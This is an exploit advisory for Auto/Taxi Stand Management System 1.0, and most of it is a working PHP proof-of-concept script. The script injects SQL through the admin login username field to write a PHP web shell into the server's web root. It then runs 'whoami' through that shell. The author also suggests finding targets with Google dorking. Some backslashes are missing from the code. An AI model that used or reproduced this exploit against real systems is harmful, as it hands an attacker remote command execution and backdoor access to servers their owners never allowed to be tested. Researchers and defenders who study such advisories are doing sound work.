Authored by indoushka

Auto/Taxi Stand Management System version 1.0 suffers from a php code injection vulnerability.

=============================================================================================================================================
| # Title : Auto/Taxi Stand Management System 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/ |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This payload inject php code contains a back door.

[+] Line 16 + 19 Set your Target.

[+] save payload as poc.php

[+] usage from cmd : C:wwwtest>php 1.php

[+] payload :

<?php
// المكتبات المطلوبة
function send_request($url, $data) {
$options = [
'http' => [
'header' => "Content-Type: application/x-www-form-urlencodedrn",
'method' => 'POST',
'content' => http_build_query($data),
]
];
$context = stream_context_create($options);
return file_get_contents($url, false, $context);
}

// تحديد URL ثابت
$url = 'http://localhost/atsms/';

// مسار ثابت لرفع الملف
$path = 'C:wwwatsmsuploaded.php';
$path = str_replace("", "\", $path);

// حمولة الباب الخلفي
$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';

// إرسال ملف PHP يحتوي على الباب الخلفي
$payload = [
'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",
'password' => 'test',
'login' => ''
];
send_request($url . "/admin/index.php", $payload);

echo "[+] PHP backdoor uploaded successfully at $pathn";

// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي
$response = file_get_contents($url . "uploaded.php?cmd=whoami");
echo "[+] Response from the backdoor (executing 'whoami'): n$responsen";
?>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================